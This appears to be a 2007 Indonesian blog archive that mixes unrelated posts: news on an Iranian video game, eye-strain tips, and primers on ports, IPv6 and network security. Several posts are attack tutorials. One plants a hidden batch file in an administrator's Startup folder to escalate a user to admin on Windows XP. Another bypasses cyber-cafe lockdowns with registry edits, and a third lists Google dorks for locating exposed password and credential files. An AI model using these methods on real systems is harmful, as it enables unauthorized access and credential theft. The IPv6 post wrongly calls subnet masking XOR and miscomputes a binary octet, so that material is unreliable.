The game has been produced by the Union of the Islamic Students, which was behind the infamous "World Without Zionism" conference in 2005 where President Mahmoud Ahmadinejad called for Israel to be "wiped from the map".

"In this game we are not promoting terrorism and violence. By freeing Iranian hostages we are promoting selflessness, devotion and defence of our country," said the group's secretary general Mohammad Taghi Fakhrian.

The eight-level game starts in Iraq, where a young married couple who are Iranian nuclear scientists have been captured by US forces while making a pilgrimage to the Shiite holy shrine in Karbala.

Enter Iranian special operations officer Bahman Nasseri, whose mission it is to save the couple, named Saeed and Maryam, who have now been spirited away to a prison in Iran's arch-foe Israel.

He slips into Israel and locates their prison.

In a twist, here he finds locked away not only the young scientists but also four other Iranians who in real life have been missing since disappearing in northern Lebanon at the height of the civil war in 1982.

There has never been any official confirmation over the fate of three Iranian diplomats and one photographer. But Tehran believes they were handed over to Israel by Lebanese Christian forces and are still alive.

A successful player completes the eight levels by killing US and Israeli soldiers, stealing their laptops which hold secret information and finally liberating the scientists and the diplomats.

A player operates the Iranian-made AK-47 machine gun of special agent Nasseri, making sure it has enough ammunition and then shooting down enemy soldiers who suddenly pop up in the three-dimensional graphics.

The enemy then falls to the ground and Fakhrian then continues his relentless pursuit of his quarry to the sound of pounding electronic music.

Anyone who loses their "life" in the game is spurred on to try again with the words: "With resistance and help you can battle the enemy." An Iranian flag flutters in the top right hand corner throughout.

Fakhrian said that the computer game had been inspired by Iran's supreme leader Ayatollah Ali Khamenei.

"The computer games are cultural mediums that have their own positive and negative effects on young people. In our last meeting with the leader he told us to come up with ways to guide our children and students.

"So we went and thought about it and found out that it is computer games which have the most influence on the young people."
http://www.breitbart.com/article.php?id=070716150635.4rha9f7k&show_article=1

27 July 2007

Jangan Terlalu Lama di depan Komputer

Hasil riset yang dilakukan National Institute of Occupational Safety and Health Los Angeles menunjukkan, hampir 88 persen dari seluruh pengguna komputer mengalami computer vision syndrome (CVS), yaitu suatu kondisi yang timbul karena kita terlalu lama memfokuskan mata ke layar komputer.

Ciri-ciri sindrom ini adalah pandangan kabur dan tak jarang sampai menyebabkan rasa nyeri di kepala, sakit leher, mata terasa lelah, kering, dan teriritasi serta sulit untuk kembali memfokuskan pandangan.

Jika Anda mengalaminya, sebaiknya mulailah melakukan langkah-langkah penanggulangan.

Seperti dilansir situs NBC5.com, Rabu (14/3/2007) ahli masalah mata (Optometrist) Dr. Jay Schlanger mengatakan, terlalu sering melihat layar komputer akan berdampak buruk pada mata.

“Mata kita tidak dikondisikan untuk terus-menerus melihat layar komputer, delapan jam sehari,” ujarnya.

Schlanger menyarankan, langkah pertama yang harus dilakukan adalah memakai kacamata dengan lensa khusus untuk komputer. “Beberapa perusahaan kini mulai membuat lensa yang bagian atasnya dirancang untuk melihat komputer, dan bagian bawahnya untuk membaca, ini dinamai kacamata kantor,” kata Schlanger.

Pengguna lensa kontak juga punya solusi, yaitu dengan mengganti lensa kontak generasi baru yang terbuat dari silikon hydrogel. “Silikon jenis ini memungkinkan daya transmisi oksigen yang lebih tinggi dibanding jenis lain,” ungkap Schlanger.

Langkah lain yang bisa dilakukan adalah dengan mengalihkan pandangan dari layar komputer. Minumlah banyak air putih selama di kantor. Ini membantu tubuh tidak kekurangan cairan, sehingga ada cukup persediaan air yang memudahkan tubuh menghasilkan air mata, dan menjaga agar mata tidak kering.

Sudut pandangan ke komputer juga harus pas, bagian atas layar komputer harus sejajar dengan mata. Sesuaikan tingkat terang/gelap layar, dan pastikan tidak ada pantulan yang menyilaukan dari sumber cahaya lain.

Dari Berbagai Sumber

11 June 2007

Exploitasi Windows XP (Fat32)

Metode eksploitasi yang akan dijelaskan hanya bekerja pada Window XP yang
menggunakan sistim Fat32. Windows XP yang file systemnya Fat32 membolehkan
user biasa mengakses direktory home dari admin yang biasanya terletak
pada:

C:\Documents and Settings\Administrator\

Sedangkan di Windows XP yang file systemnya sudah NTFS, user biasa tidak
akan bisa mengakses direktory home dari admin. Kalau dipaksakan maka
dipastikan dengan sukses akan keluar pesan

Access Denied

Proses eksploitasi dapat dilakukan dengan cara...

MELIHAT USER YANG TERDAFTAR

C:\DOCUME~1\mRt>net user

User accounts for \\CyberCafe

------------------------------------------------------------
Administrator Guest mRt
HelpAssistant SUPPORT_388945a0 Win_Xp
The command completed successfully.

MELIHAT HAK AKSES USER

C:\DOCUME~1\mRt>net user Win_Xp
User name Win_Xp
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 1/9/2005 3:38 AM
Password expires Never
Password changeable 1/9/2005 3:38 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/26/2005 11:16 PM

Logon hours allowed All

Local Group Memberships *Administrators <-- ketahuan aksesnya Global Group memberships *None The command completed successfully. Setelah mengetahui siapa user yang mempunyai akses admin, sekaranglah saatnya untuk beraksi. Pertama-tama buat dulu script batch yang akan mengangkat user kita menjadi admin. <++ batchfile ++>

net localgoup Administrators mRt /add

<-- batchfile -->

setelah kita buat script batch tersebut, kemudian simpan di
direktory:

C:\Documents and Settings\Win_Xp\Start Menu\Programs\Startup

Agar kelihatan lebih rapi sebaiknya script batch tersebut dibuat
hidden. Lalu mengunggu user yang mempunyai akses admin tersebut
login, setelah user yang mempunyai akses admin tersebut login
maka akses user yang ada pada kita bakalan hilang digantikan
dengan akses admin.

Penutup
Disayangkan, cara ini dapat mengundang kecurigaan admin, karena ketika
sang admin telah melakukan proses login maka dia akan melihat sekelebat
tampilan DOS Prompt yang tiba-tiba muncul di desktopnya.

Semoga artikel ini dapat "sedikit" menambah pengetahuan kita semua.
referensi :
- http://www.google.com/
- The Complete Windows Trojan Paper by Dancho Danchev


by:martin_csk@yahoo.com

04 June 2007

TIPS && TRICK DI WARNET

*Pernahkah suatu saat anda berkunjung ke "cyber cafe" a.k.a warnet
dan anda merasa kerepotan dengan berbagai 'restrict' yang diberlakukan
+disini aku sedikit coba mengulas, apa saja yang dapat anda lakukan
jika anda berada di posisi pemakai dan yang harus anda perhatikan jika
anda berada pada posisi penyedia layanan :PO .

-=PErlindungan Wind*ws explorer
pelarangan penggunaan key wind*ws dengan cara ekstrim banget ( yaitu
dengan mengeksekusi mati tombol tersebut :) ) sehingga anda tidak dapat
melakukan , windows key + e (to open the explorer), ..
hal yang bisa anda lakukan adalah:
-klik-kanan start menu dan pilih explore

-=pelarangan penggunaan win# explorer anda.

-pilih mydocuments, yang akan menjadi jalan pembuka anda ke explorer
jika anda kerepotan karena kehilangan tree view di kiri anda, jangan
khawatir apalagi panik dan berteriak-teriak memanggil operator :P, yang
perlu dan bisa anda lakukan adalah,
arahkan kursor keatas, pada bar atas, pilih view > kemudian Explorer bar
> folders :: apakah sudah nampak seperti explorer bagi anda.

-Kesalahan yang dilakukan oleh penyedia layanan ataupun kelemahan OS tsb
adalah dengan memanfaatkan kelebihan/ kel**han Micr*s**k Internet
Explorer anda , yaitu bukalah browser anda, ketikkan c:\ atau a:\ atau
apapun juga,
* dan saya pernah mengalami kejadian ini, qkqkqkqkqkqk
-pada win* explorer , anda tidak bisa mengakses drive a:\ tanpa password
dari admin a.k.a yang punya (they used another third parties program)
tetapi dengan menggunakan IE anda dapat mengaksesnya tanpa kesulitan :)
atau bahkan tanpa ketahuan :P

ps: ternyata win# explorer dan Mic# IE gak kompak :P

-=apabila windows yang anda pakai tak bisa menampilkan run aku sering pakai run buat mempercepat menggunakan "notepad", "mspaint",
dan tentu saja "command" :P >

yang kudu dilakukan;

-buka teks editor a.k.a notepad or wordpad, lalu ketik dan pastekan ini.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
"NoRun"=dword:00000000

-save sebagai echo.reg [or whatever asal ekstensionnya REG]
-double klik file tersebut , jawab dengan mengklik - yes
-restart pc, cukup dengan Ctrl+Alt+Del, jika keluar popup.pilih eXplorer
terus di endtask aja, wait bentar.. kalo ada popup lagi enDtask lagi :P

=+cara termudah kalo regedit bisa dipakai kamu bisa memasukkannya dari
regedit, coba ketik C:\WINDOWS\regedit.exe di barnya eXplorer, ataupun
pada URL BARnya Internet EXplorer anda :P maka akan keluar window baru
yang berisi regedit :P :),

masuk ke
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Explorer
buat dword baru dan masukkan NoRun dengan dword 00000000

-=kalo regeditnya juga diilangin,nangis aja deh ;p hehhehe, gak kok, kan
kamu bisa buat file diatas itu..
kalo gak munculin dulu regeditnya, caranya :

cara 1-4 sama kayak diatas (males ngetikinnya):
tapi yang dipaste beda ;) ;P


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
"DisableRegistryTools"=dword:00000001

[oke]==
kalo kamu mau repot tinggal buat aja programnya, yang cuma ngejalanin
sintax tersebut diatas dsb.. banyak dah toolsnya..!



EOF.

"segini dulu deh, semoga bermanfaat!, jangan dibuat yang aneh-aneh kalo
gak mau jadi aneh :P"


REFERENSI a.k.a bacaan :
diinspirasi dari berbagai sumber yang dah lawas <*maaf, terlupakan> ,
thanks tuk penulis sebelumnya && percobaan pribadi


*greetz to:
[echostaff a.k.a moby, the_day, comex ,z3r0byt3 ,netrat] && puji_tiwili*
anak anak newbie_hacker, pak onno, pak linus, pak eric s. Raymond,
pak RM. stallman, $peci@l temen2 seperjuangan

kirimkan kritik && saran ke y3dips[at]echo.or.id

Hackers Fact and Fiction

Sudah tidak jarang aku temui atau kita temui bahwa dibeberapa (hampir semua)
media (baik elektronik dan surat kabar) menampilkan berita atau bahkan menjadi
headline dimedia tersebut yang bertuliskan "Seorang Hacker menjebol ****** dan
mencuri ribuan kartu kredit", atau "Hacker situs "211611" akhirnya tertangkap",
atau bahkan hanya "Hacker mengganti tampilan situs ANU dan merubah beberapa
artikel penting".

Terus terang saja cita citaku adalah menjadi hacker (just like u, i just want
to be a hacker)dan hampir di setiap permulaan "seminar" atau "workshop" yang
kebetulan akulah pembawa materinya, maka selalu aku menyebutkannya, dan
setiap kali itu pula berpasang-pasang mata berdelik curiga, menuduh, dan
tidak percaya (sambil geleng kepala) bahwa ada "orang bodoh" lainnya yang
mau-maunya bercita-cita menjadi hacker, atau bahkan berfikir dalam hati "sial,
pembicara kali ini pengen jadi kriminal, salah pilih seminar nih".

Wajar saja, didikan media baik dalam negeri dan luar negeri memang membentuk
pola fikir seperti itu, (ingat bagaimana kita sama-sama dengan pasti mengikuti
satu "script (kalimat)" dari suatu iklan, baik secara sadar atau tidak).
Tidak hanya satu kali film-film keluaran "hollywood" dan lain sebagainya
[MAAF] "memperkosa" pengertian hacker demi keuntungan pribadi/pihak tertentu.

Disini aku mengutip Pengantar yang di tulis oleh Jeff Moss pada sebuah buku
yang berjudul "Stealing the Network: How to Own a Continent" terbitan Syngress,
dan disitu Jeff Moss mengatakan bahwa :

" The term hacker has been co-opted through media hype and
marketing campaigns to mean something evil. It was a convenient
term already in use, and so instead of simply saying someone
was a criminal hacker, the media just called him a hacker.
You would not describe a criminal auto mechanic as simply a
mechanic, and you shouldn't do the same with a hacker, either."
-- 3rd paragraph

Nah, dari kalimat diatas jelas bahwa Jeff Moss ingin mengatakan bahwa
Gembar-gembor media dan keuntungan penjualanlah yang membuat penyalahgunaan
arti hacker, secara ekstrim aku ingin mengambil contoh seorang Guru
yang telah melakukan suatu tindak kriminal pembunuhan, apakah aku dan kita
dengan serta merta menyebut guru adalah pembunuh dan semua guru-guru
lainnya adalah kriminal ? aku rasa tidak, dan yang menjadi pertanyaan
adalah kenapa hal itu tidak berlaku pada hacker, apakah seorang "criminal hacker"
akan di sebut hacker dan hacker adalah seorang kriminal?

Masih tetap di buku yang sama dan di chapter yang sama (pengantar) Jeff Moss
mengungkap bahwa hacker bukan hanya masalah kemampuan tetapi juga "moral"

"While you may have the skills, if you lack the mental fortitude,
you will never reach the top. This is what separates the truly
elite hackers from the wannabe hackers." -- 1st paragraph

Apabila moral tidak terpenuhi maka individu tersebut tidak akan pernah dapat
meraih puncak, dan hal inilah yang sesungguhnya menjadikan pembeda antara
"hacker elit" dan "hacker pemula".

Apabila kamu semakin frustasi dengan pengertian hacker, Jeff Moss menyebutkan
bahwa hacker adalah seseorang yang secara teknis memiliki gabungan kemampuan
sebagai seorang programmer dan administrator sistem komputer yang saling melengkapi.

" Originally, it was a compliment applied to technically adept
computer programmers and system administrators." -- 2nd pragraph

Kevin Mitnick dalam kalimat pengantar di bukunya yang berjudul Art Of Deception,
juga menyebutkan bahwa hacker yang merusak (berbuat kriminal?) disebut
juga "crackers" atau "vandals" dan mereka yang hanya mendownload tools
untuk masuk ke sistem komputer hanyalah "Script Kiddies".

" Some hackers destroy people's files or entire hard drives;
they're called crackers or vandals. Some novice hackers don't
bother learning the technology, but simply download hacker tools
to break into computer systems; they're called script kiddies. "
- Preface
y3dips
---// Referensi

1. Jeff Moss, (Dark tangent, BlackHat.inc)
Stealing the Network: How to Own a Continent, Syngress Publishing (c) 2004

2. Kevin Mitnick, (Condor, )
THE ART OF DECEPTION : "Controlling the Human Element of Security"
Pengenalan Port


Mungkin kita sudah gak asing ama istilah port number, tapi buat yang
belum tahu port adalah sebuah lubang yang memungkinkan suatu (data)
untuk memasukinya. Komputer bisa dikatakan memiliki 2 macam port,
yaitu port fisik dan port perangkat lunak. Port fisik adalah slot yg
ada pada bagian belakang CPU, sedangkan port perangkat lunak adalah port
yg dipakai oleh software saat melakukan koneksi dengan komputer lain.
Nah yg berhubungan secara langsung dengan kegiatan kita saat bermain dgn
internet adalah
port perangkat lunak. Port perangkat lunak ini dapat kita bedakan
menjadi 3, yaitu:

a)well known port
port jenis ini memiliki range dari 0-1023,semula sih hanya memiliki
range dari 0-255 tapi oleh IANA(Internet Assigned Number Authority)
dilebarkan menjadi range tadi yg disebutkan diawal. Pada kebanyakan
sistem port pada range ini hanya dapat dipakai oleh root,atau oleh
program yang dijalankan oleh user. Karena range-nya dari 0-1023 maka
port2 terkenal seperti ftp(21),ssh(22),telnet(23),http(80) termasuk
dalam jenis ini.

b)Registered Ports
memiliki range dari 1024-49151, port jenis ini tidak ditujukan untuk
service tertentu dari suatu server. Lalu apa gunanya dong?? hehehe,
port pada range ini biasanya digunakan oleh Networking utlites seperti
Browser, Email Client, FTP software untuk berkomunikasi dengan remote
server. Biasanya Networking utlites akan membuka secara acak port pada
range ini untuk terhubung dgn remote server. Port number pada range
inilah yang membuat kita dapat melakukan surfing di internet,melakukan
pengecekan e-mail,dll. Jadi sangat berguna kan? hehehe Port ini akan
membuka sementara ketika kita sedang menjalankan sebuah aplikasi
sehingga apabila kita menutup aplikasi tersebut maka secara otomatis
port ini pun akan tertutup dgn sendirinya(ingat Networking utlites
membukanya secara acak)

c)The Dynamic/Private Ports
memiliki range dari 49152-65535, biasanya sih digunakan oleh sebagian
besar trojan(waaaaaaaa..), tapi ada juga sih program yang memkai port
ini terutama program yang memerlukan range port number yang besar,
seperti pada Sun yang menjalankan RPC pada port 32768.

Untuk lebih jelasnya mari kita lihat :

C:\windows>netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED
TCP juve:1036 juve.box.sk:ftp-data TIME_WAIT
TCP juve:1043 banners.egroups.com:80 FIN_WAIT_2
TCP juve:1045 mail.kalteng.net.in:pop3 TIME_WAIT
TCP juve:1052 banners.boxnetwork.net:80 ESTABLISHED
TCP juve:1053 mail.kalteng.net.in:pop3 TIME_WAIT
UDP juve:1025 *:*
UDP juve:nbdatagram *:*

Mari kita ambil satu baris dari contoh diatas :

Proto Local Address Foreign Address State
TCP juve:1031 juve.box.sk:ftp ESTABLISHED

data diatas menunjukan pada kita bahwa:
*Protocol: TCP (ini adalah Transmission Control Protocol atau TCP, User
Datagram
Protocol atau UDP, IP atau Internet Protocol)
*Nama lokal sistem: juve (ini adalah nama dari lokal sistem yang kita
setting pada windows setup)
*Lokal port yang terbuka dan digunakan pada saat melakukan koneksi ini
adalah: 1031
*Remote Sistem: juve.box.sk (ini adalah non-numerical form dari sistem
dimana kita terkoneksi)
*Remote Port: ftp (ini adalah port number dari remote sistem
kalteng.box.sk dimana kita terkoneksi)
*Keterangan koneksi: ESTABLISHED

Itu dulu yah..ntar kapan2 kita sambung lagi,mudah2an ada gunanya buat
kalian. Keep Learning!!!

Penulis :juventini
Email:juventinI@kalteng.net

Pengenalan Internet Protokol versi 6 (IPv6)

Pengenalan Internet Protokol versi 6 (IPv6)


Assalamualaikum wr.wb

Awalnya artikel ini saya tulis tentang implementasi IPv6 pada sistem operasi linux,
tetapi setelah saya tulis kok kepanjangan kalo hanya dijadikan satu primbon oleh
karena itu saya memutuskan menuliskannya kedalam 2 primbon (yaitu pengenalan IPv6 primbon #1,
dan Implementasi IPv6 pada sistem operasi linux primbon #2).


Dalam jaringan komputer dikenal adanya suatu protokol yang mengatur bagaimana
suatu node berkomunikasi dengan node lainnya didalam jaringan, protokol tersebut
berfungsi sebagai bahasa agar satu komputer dapat berkomunikasi satu dengan yang lainnya.
protokol yang merupakan standar de facto dalam jaringan internet yaitu protokol TCP/IP,
sehingga dengan adanya TCP/IP komputer yang dengan berbagai jenis hardware dan berbagai
jenis sistem operasi (linux,Windows X, X BSD, de el el) tetap dapat berkomunikasi.

Internet Protocol (IP) merupakan inti dari protokol TCP/IP, seluruh data yang berasal dari
layer-layer diatasnya harus diolah oleh protokol ini agar sampai ketujuan.versi IP yang saat
ini telah dipakai secara meluas di internet adalah Internet Protocol versi 4 (IPv4).

perkembangan internet yang sangat pesat sekarang ini menyebabkan alokasi alamat (IP addres)
IPv4 semakin berkurang, hal ini menyebabkan harga IP address legal sangat mahal
(kecuali maok!!!heu...heu...).Untuk mengatasi kekurangan alokasi IP address maka IETF
mendesain suatu IP baru yang disebut Internet Protocol versi 6 (IPv6).

pada IPv6, panjang alamat terdiri dari 128 bit sedangkan IPv4 hanya 32 bit. sehingga IPv6
mampu menyediakan alamat sebanyak 2^128 [2 pangkat 128] atau 3X10^38 alamat, sedangkan IPv4
hanya mampu menyediakan alamat sebanyak 2^32 atau 4,5X10^10 alamat.

oke, tadi cuma intro aja! sekarang kita lanjutkan ke yang lebih dalam lagi.
kemon baybeh!!!!!

sekarang saya akan menjelaskan perbedaan yang lainnya antara IPv4 dengan IPv6.

A.Struktur pengalamatan

#IPv4

pengalamatan IPv4 menggunakan 32 bit yang setiap bit dipisahkan dengan notasi titik.
notasi pengalamatan IPv4 adalah sebagai berikut:

XXXXXXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

dimana setiap simbol X digantikan dengan kombinasi bit 0 dan 1.misalnya:

10000010.11001000.01000000.00000001 (dalam angka biner)

cara penulisan lain agar mudah diinget adalah dengan bentuk 4 desimal yang dipisahkan
dengan titik. misal untuk alamat dengan kombinasi biner seperti diatas dapat dituliskan
sebagai berikut:

130.200.127.254

penulis sudah menganggap teman-teman semua dah bisa cara untuk mengkonversi dari bilangan
biner ke desimal:). cos' kalo harus dijelasakan lagi nanti tambah ruwet nih artikel:p
oke sekarang berlanjut ke struktur pengalamatan IPv6!


#IPv6

Tidak seperti pada IPv4 yang menggunakan notasi alamat sejumlah 32 bit, IPv6 menggunakan
128 bit. dah tau khan kenapa jadi 128 bit? yup biar alokasinya bisa lebih banyak.
oke sekarang kita liat notasi alamat IPv6 adalah sebagai berikut:

X:X:X:X:X:X:X:X

kalo dalam bentuk biner ditulis sebagai berikut:

1111111001111000:0010001101000100:1011111001000001:1011110011011010:
0100000101000101:0000000000000000:0000000000000000:0011101000000000

(dua blok diatas sebenarnya nyambung tapi agar tidak memakan tempat maka ditulis kebawah)
itu notasi alamat IPv6 kalo dalam bentuk biner hal ini sengaja saya tulis bukan untuk membuat
pusing yang baca tetapi untuk menunjukkan betapa panjangnya alamat IPv6.
silahkan bandingkan dengan panjangnya IPv4.

nah! agar lebih mudah diinget setiap simbol X digantikan dengan kombinasi 4 bilangan
heksadesimal dipisahkan dengan simbol titik dua [:]. untuk contoh diatas dapat ditulis sbb:

FE78:2344:BE43:BCDA:4145:0:0:3A

lebih enak diliatnya khan?nah sistem pengalamatan IPv6 dapat disederhanakan jika terdapat
berturut-turut beberapa angka "0". contohnya untuk notasi seperti diatas dapat ditulis:

FE78:2344:BE43:BCDA:4145:0:0:3A -------> FE78:2344:BE43:BCDA:4145::3A

contoh lagi:

8088:0:0:0:0:0:4508:4545 -------->8088::4508:4545


B.Sistem pengalamatan

#IPv4

Sistem pengalamatan IPv4 dibagi menjadi 5 kelas, berdasarkan jumlah host yang dapat dialokasikan
yaitu:

Kelas A : range 1-126
Kelas B : range 128-191
kelas C : range 192-223
kelas D : range 224-247
kelas E : range 248-255

tapi yang lazim dipake hanya kelas A,B dan C sedangkan kelas D dipakai untuk keperluan alamat
multicasting dan kelas E dipake untuk keperluan eksperimental.

selain itu pada IPv4 dikenal istilah subnet mask yaitu angka biner 32 bit yang digunakan untuk
membedakan network ID dan host ID, menunjukkan letak suatu host berada dalam satu jaringan
atau lain jaringan.contohnya kaya gini:

IP address: 164.10.2.1 dan 164.10.4.1 adalah berbeda jaringan jika menggunakan netmask
255.255.254.0, tetapi akan jika netmasknya diganti menjadi 255.255.240.0 maka kedua
IP address diatas adalah berbeda jaringan. paham belom? kalo belom paham gini caranya:


164.10.2.1-------> 10100100.00001010.00000010.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00000010.00000000-->164.10.2.0
dan
164.10.4.1-------> 10100100.00001010.00001000.00000001
255.255.254.0----> 11111111.11111111.11111110.00000000
____________________________________ XOR
10100100.00001010.00001000.00000000-->164.10.4.0


operasi XOR caranya seperti pertambahan waktu SD, cuman lebih mudah, gampangnya gini kalo
angka "1" jumlahnya genap hasilnya "1" kalo jumlah "1" ganjil hasilnya "0" (1+1=1, 1+0=0)
(heu...heu...).

terlihat hasil operasi XOR dua IP address dengan netmask yang sama hasilnya beda berarti
kedua IP address tersebut berbeda jaringan. untuk contoh berikutnya yang menggunakan
netmask 255.255.240.0 silahkan coba sendiri.

#IPv6

pada IPv6 tidak dikenal istilah pengkelasan, hanya IPv6 menyediakan 3 jenis pengalamatan
yaitu: Unicast, Anycast dan Multicast. alamat unicast yaitu alamat yang menunjuk pada sebuah
alamat antarmuka atau host, digunakan untuk komunikasi satu lawan satu. pada alamat unicast
dibagi 3 jenis lagi yaitu: alamat link local, alamat site local dan alamat global.
alamat link local adalah alamat yang digunakan di dalam satu link yaitu jaringan local yang
saling tersambung dalam satu level. sedangkan alamat Site local setara dengan alamat privat,
yang dipakai terbatas di dalam satu site sehingga terbatas penggunaannya hanya didalam satu
site sehingga tidak dapat digunakan untuk mengirimkan alamat diluar site ini.
alamat global adalah alamat yang dipakai misalnya untuk Internet Service Provider.

alamat anycast adalah alamat yang menunjukkan beberapa interface (biasanya node yang berbeda).
paket yang dikirimkan ke alamat ini akan dikirimkan ke salahsatu alamat antarmuka yang paling
dekat dengan router. alamat anycast tidak mempunyai alokasi khusus, cos' jika beberapa
node/interface diberikan prefix yang sama maka alamat tersebut sudah merupakan alamat anycast.

alamat multicast adalah alamat yang menunjukkan beberapa interface (biasanya untuk node yang
berbeda). Paket yang dikirimkan ke alamat ini maka akan dikirimkan ke semua interface yang
ditunjukkan oleh alamat ini. alamat multicast ini didesain untuk menggantikan alamat broadcast
pada IPv4 yang banyak mengkonsumsi bandwidth.

Tabel alokasi alamat IPv6
__________________________________________________________________
|alokasi | binary prefix |contoh (16 bit pertama |
|_______________|__________________________|_______________________|
|Global unicast |001 | 2XXX ato 3XXX |
|link local |1111 1110 10 | FE8X - FEBx |
|site local |1111 1110 11 | FECx - FEFx |
|Multicast |1111 1111 | FFxx |
|_______________|__________________________|_______________________|

selain alamat diatas tadi ada juga jenis pengalamatan lainnya diantaranya:

#IPv4-compatible IPv6 address biasanya alamat ini digunakan untuk mekanisme transisi Tunelling
format alamatnya kaya gini:

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| 0000 | IPv4 address |
+-------------------+------+---------------------+

contohnya:
= 0:0:0:0:0:0:192.168.30.1
= ::192.168.30.1
= ::C0A8:1E01
jadi 0:0:0:0:0:0:192.168.30.1=::c0AB:1E01 kok bisa dapat dari mane? gini caranya:
buat dulu alamat 0:0:0:0:0:0:192.168.30.1 jadi biner
::11000000.10101000.00011110.00000001 kemudian kelompokkan menjadi masing 16 bit
::[1100.0000.1010.1000]:[0001.1110.0000.0001] diubah ke heksa desimal--->::C0A8:1E01
tanda "." (titik) didalam kurung untuk mempermudah konversi dari biner ke heksadesimal.
sudah pahamkan? masih belum juga silahkan ulangi lagi dengan perlahan:p

#IPv4-mapped IPv6 address biasanya digunakan untuk mekanisme transisi ISATAP.

80 bits |16 | 32 bits |
+-------------------+------+---------------------+
|0000...........0000| FFFF | IPv4 address |
+-------------------+------+---------------------+

contohnya: =::FFFF:192.168.1.2

#IPv6 over ethernet digunakan untuk stateless autoconfiguration (pemberian alamat IPv6
secara otomatis tanpa memerlukan server yang memberi alokasi IP address, mirip DHCP
cuman tanpa server).
contoh:
00:90:27:17:FC:0F
/\
/ \
FF FE
maka alamatnya menjadi 00:90:27:FF:FE:17:FC:0F kemudian diblok pertama bit ketujuh diinvers
00:90:27:17:FC:0F
|
|
\|/
000000[0]0 bit yang dikurungi diinvers dari 0--->1
maka sekarang menjadi 02:90:27:FF:FE:17:FC:0F alamat tersebut adalah alamat IPv6 over ethernet.

oke mungkin segitu dulu tulisan dari saya, sebagai dasar teori untuk IPv6 (ceile!!!!),
sebenarnya masih banyak yang ingin saya tulis cuman nanti terlalu panjang nih artikel takut
ga ada yang baca. (heu.....heu...)

semoga tetap dalam semangat untuk berbagi!!!!!
Wassalam


kritik&saran silahkan kirim ke pan6eran_biru[at]yahoo.com




Referensi:-TCP/IP standard,desain dan Implementasi, Onno W.purbo dkk
-Teori dan Implementasi IPv6 Protokol Internet Masa depan, Riza Taufan
-Interkoneksi IPv6 dengan menggunakan DSTM, Dody Setiawan
-Implementasi dan Analisa Teredo untuk interkoneksi jaringan IPv6/IPv4 dengan jaringan IPv6 yang melalui IPv4 NAT (Network Address Translation), Wahidi Somad
-Introduction & Deployment IPv6 Tutorial,Che Rohani Ishak dkk

31 May 2007

Mengamankan Jaringan Komputer

Mengamankan jaringan komputer membutuhkan tiga tingkatan proses. Untuk
mengamankan jaringan komputer kita harus dapat melakukan pemetaan terhadap
ancaman yang mungkin terjadi.

Prevention (pencegahan)

Kebanyakan dari ancaman akan dapat ditepis dengan mudah, walaupun
keadaan yang benar-benar 100% aman belum tentu dapat dicapai. Akses yang
tidak diinginkan kedalam jaringan komputer dapat dicegah dengan memilih dan
melakukan konfigurasi layanan (services) yang berjalan dengan hati-hati.

Observation (observasi)

Ketika sebuah jaringan komputer sedang berjalan, dan sebuah akses
yang tidak diinginkan dicegah, maka proses perawatan dilakukan. Perawatan
jaringan komputer harus termasuk melihat isi log yang tidak normal yang dapat
merujuk ke masalah keamanan yang tidak terpantau. System IDS dapat digunakan
sebagai bagian dari proses observasi tetapi menggunakan IDS seharusnya tidak
merujuk kepada ketidak-pedulian pada informasi log yang disediakan.

Response (respon)

Bila sesuatu yang tidak diinginkan terjadi dan keamanan suatu system
telah berhasil disusupi, maka personil perawatan harus segera mengambil
tindakan. Tergantung pada proses produktifitas dan masalah yang menyangkut
dengan keamanan maka tindakan yang tepat harus segera dilaksanakan. Bila
sebuah proses sangat vital pengaruhnya kepada fungsi system dan apabila
di-shutdown akan menyebabkan lebih banyak kerugian daripada membiarkan
system yang telah berhasil disusupi tetap dibiarkan berjalan, maka harus
dipertimbangkan untuk direncakan perawatan pada saat yang tepat [1]. Ini
merupakan masalah yang sulit dikarenakan tidak seorangpun akan segera tahu
apa yang menjadi celah begitu system telah berhasil disusupi dari luar.

Victims/statistic (korban/statistik)

Keamanan jaringan komputer meliputi beberapa hal yang berbeda yang
mempengaruhi keamanan secara keseluruhan. Serangan keamanan jaringan komputer
dan penggunaan yang salah dan sebegai contoh adalah virus, serangan dari
dalam jaringan komputer itu sendiri, pencurian perangkat keras (hardware),
penetrasi kedalam system, serangan "Denial of Service" (DoS), sabotase,
serangan "wireless" terhadap jaringan komputer, penggantian halaman depan
situs (website defacement), dan penggunaan yang salah terhadap aplikasi web.
Statistik menunjukkan jumlah penyusupan didalam area ini sudah cukup banyak
berkurang dari tahun 2003 [24], tipe variasi dari serangan, bagaimanapun juga,
menyebabkan hampir setiap orang adalah sasaran yang menarik.

echo|zine, volume 4, issue 13

30 May 2007

Google Hacking

metode 1
coba masukkan keyword berikut pada gogole:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurlasslist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

metode 2
masukkan string berikut pada google untuk mencari file mp3

intitle:index.of mp3

kamu tinggal masukin aja nama lagu/penyayi/artis/judul:
example : intitle:index.of mp3 jackson

kamu juga bisa mengubah untuk mencari file2 lain misalnya yg berektensi zip..
example : intitle:index.of *.zip namafile atau example : intitle:index.of zip namafile

metode 3
masukkan string berikut pada google search:
inurl:microsoft filetype:iso
dan terserah dengan apa yang ingin kamu cari, ex. microsoft ,adobe, iso , zip etc…
"# -FrontPage-" inurl:service.pwd
ini buat ngedapetin frontpage password !!

"sets mode: +k"
yang ini buat ngedapetin password channel IRC.

allinurl: admin mdb
buat ngedapetin admin database!

allinurl:auth_user_file.txt
password n user yang disimpang dalam bentuk txt

intitle:"Index of" config.php
user password database..

eggdrop filetype:user user
konfigurasi eggdrop.

intitle:index.of.etc
untuk mengakses etc directory..

nyari serian number windows xp
